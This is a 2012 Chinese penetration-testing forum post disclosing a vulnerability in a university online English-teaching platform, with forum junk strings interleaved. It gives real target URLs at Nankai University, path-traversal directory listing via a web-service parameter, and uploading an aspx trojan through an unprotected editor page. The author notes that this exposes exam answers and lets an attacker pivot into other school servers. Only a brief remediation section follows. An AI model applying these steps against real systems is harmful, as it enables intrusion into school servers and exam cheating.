中国网络渗透测试联盟
标题:
新理念外语网络教学平台文件上传漏洞
[打印本页]
作者:
admin
时间:
2012-12-4 11:10
标题:
新理念外语网络教学平台文件上传漏洞
好多大学都在用这个教学平台,这个漏洞会导致直接拿到试题答案,甚至作为跳板继续渗透进入学校其他服务器中
( Q y' h+ n! K/ P3 z o+ ^4 T o
$ V9 d) ~& S. }$ H+ s7 ], A
详细说明:
6 ?0 ^ P4 R S$ n' ]
& Q* j' t$ Q! T* ?9 P, ~( Z, M
以南开大学的为例:
4 A9 Z! E4 R5 y9 d
http://222.30.60.3/NPELS
* O1 q0 W% G7 E. G$ E* c
NPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址
* Z/ S+ V6 b4 }; z. n) {
<setting name="Update_CommonSvr_CommonService" serializeAs="String">
; l5 ^0 N5 {6 P7 ?, r
<value>http://222.30.60.3/NPELS/CommonService.asmx</value>
3 B1 p' @) a+ _6 z. k
</setting>
) F6 h+ [8 J7 t* G6 m
及版本号
* l0 K' V0 C9 h. V! b5 E, C
<add key="TVersion" value="1, 0, 0, 2187">
2 g8 a& p# \) T2 J
</add>
9 S+ }8 B% Z& y, j) e& c6 l( S
直接访问
! W( [6 Q: d0 ?% S( G
http://222.30.60.3/NPELS/CommonService.asmx
1 j6 E( @2 r5 C$ C. Y, Q/ `0 l
使用GetTestClientFileList操作,直接 HTTP GET 列目录:
4 d/ _) Q/ i) r& P9 Z
http://222.30.60.3/NPELS/CommonS ... tFileList?version=1
, 0, 0, 2187
' ]% `9 N q' L0 O- T/ p A
进一步列目录(返回的网页很大,可以直接 wget 下来)
7 f' V" y& `# D- R7 r, x, N- {8 y
http://222.30.60.3/NPELS/CommonS ... List?version=../../
3 x8 D, a. B9 o% A
+ j9 t! k) s+ |" b' ^" P: E$ r
发现
( ?" c7 H) \0 s8 D
http://zzxx.nankai.edu.cn/npelsv/editor/editor.htm
]& u. u8 f) t0 o
可以上传,直接上传aspx木马即可,不需要改后缀名或者文件头
9 {+ @6 ?: g ~( Z( t
上传后继续列目录找到木马地址直接访问即可
, H8 J1 F: U4 w% a y' D) w
5 \ K0 n0 [' {
OOXX
5 Y- v8 `0 H+ X+ P; y
( {; Y. w5 T. h- {9 U7 o( e
Google "新理念外语网络教学平台" 测试了几个其他的站,都有类似的列目录上传方法
* X# J/ _) i, o( ^8 L, y6 B
漏洞证明:
' h) d! `/ _, u
0 b! S" h: I) n
列目录:
8 O- u& N% c- _* x# X
http://222.30.60.3/NPELS/CommonS ... List?version=../../
& M! Y9 f! a" ?# k
文件上传:
- t; S6 B& F' `- s. D/ }2 m
http://222.30.60.3/npelsv/editor/editor.htm
+ \5 h( \0 Q: V% [8 o& `
2 V+ s' H! e* @2 u2 ?
上传木马:
3 l2 b) b* Z6 I q2 R* g% A2 ~
http://222.30.60.3/npelsv/editor/uploadfiles/1.aspx
. }5 }7 G) j) ?' I0 D: X0 X) s
4 Q( V3 M! Z( b6 s% W- z, U& v
修复方案:
% J8 g4 x- A* ~6 d! ^
好像考试系统必须使用 CommonService.asmx
' v8 D8 C7 P5 [0 _: F; y$ i
最好配置文件加密或者用别的方式不让它泄露出来
! c3 x" c8 s% I6 A0 K
并且检查或删除各上传入口,像
http://222.30.60.3/NPELS/Upload.aspx
一样
+ c6 e" Z5 m( T* O9 @5 B
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2